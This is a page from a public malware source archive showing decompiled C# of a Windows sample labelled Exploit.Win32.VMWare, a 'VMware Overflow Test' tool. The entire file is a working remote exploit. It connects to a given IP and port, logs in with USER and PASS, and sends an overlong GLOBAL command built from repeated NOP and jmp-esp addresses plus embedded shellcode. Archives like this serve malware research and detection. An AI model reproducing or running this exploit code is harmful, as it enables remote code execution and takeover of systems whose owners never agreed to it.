mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
207 lines
14 KiB
C#
207 lines
14 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: <Module>
|
|||
|
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security;
|
|||
|
|
|||
|
internal class \u003CModule\u003E
|
|||
|
{
|
|||
|
public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
|
|||
|
public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
|
|||
|
public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
|
|||
|
public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
|
|||
|
public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
|
|||
|
public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
|
|||
|
public static \u0024ArrayType\u00240x24ec09a1 shellcode;
|
|||
|
public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;
|
|||
|
|
|||
|
public static unsafe void usage()
|
|||
|
{
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
|
|||
|
}
|
|||
|
|
|||
|
public static unsafe int main(int argc, sbyte** argv)
|
|||
|
{
|
|||
|
if (argc != 6)
|
|||
|
{
|
|||
|
\u003CModule\u003E.usage();
|
|||
|
return 0;
|
|||
|
}
|
|||
|
WSAData wsaData;
|
|||
|
\u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
|
|||
|
uint num1 = \u003CModule\u003E.socket(2, 1, 6);
|
|||
|
sockaddr_in sockaddrIn;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(short&) ref sockaddrIn = (short) 2;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
|
|||
|
if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
|
|||
|
{
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: explicit reference operation
|
|||
|
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
|
|||
|
}
|
|||
|
if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
|
|||
|
{
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
|
|||
|
return -1;
|
|||
|
}
|
|||
|
\u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
|
|||
|
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
|
|||
|
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
|
|||
|
uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
|
|||
|
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
|
|||
|
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
|
|||
|
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
|
|||
|
uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
|
|||
|
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
|
|||
|
// ISSUE: initblk instruction
|
|||
|
__memset(ref arrayType0x8011bcc8, 0, 4096);
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
|
|||
|
int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
|
|||
|
uint num5 = 36;
|
|||
|
do
|
|||
|
{
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
|
|||
|
num4 += 8;
|
|||
|
--num5;
|
|||
|
}
|
|||
|
while (num5 > 0U);
|
|||
|
// ISSUE: cast to a reference type
|
|||
|
// ISSUE: cpblk instruction
|
|||
|
__memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
|
|||
|
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
|
|||
|
uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
|
|||
|
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
|
|||
|
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
|
|||
|
\u003CModule\u003E.closesocket(num1);
|
|||
|
\u003CModule\u003E.WSACleanup();
|
|||
|
return 1;
|
|||
|
}
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int printf([In] sbyte* obj0, __arglist);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern int WSACleanup();
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern int closesocket([In] uint obj0);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe uint strlen([In] sbyte* obj0);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe uint inet_addr([In] sbyte* obj0);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int atoi([In] sbyte* obj0);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern ushort htons([In] ushort obj0);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern uint _mainCRTStartup();
|
|||
|
}
|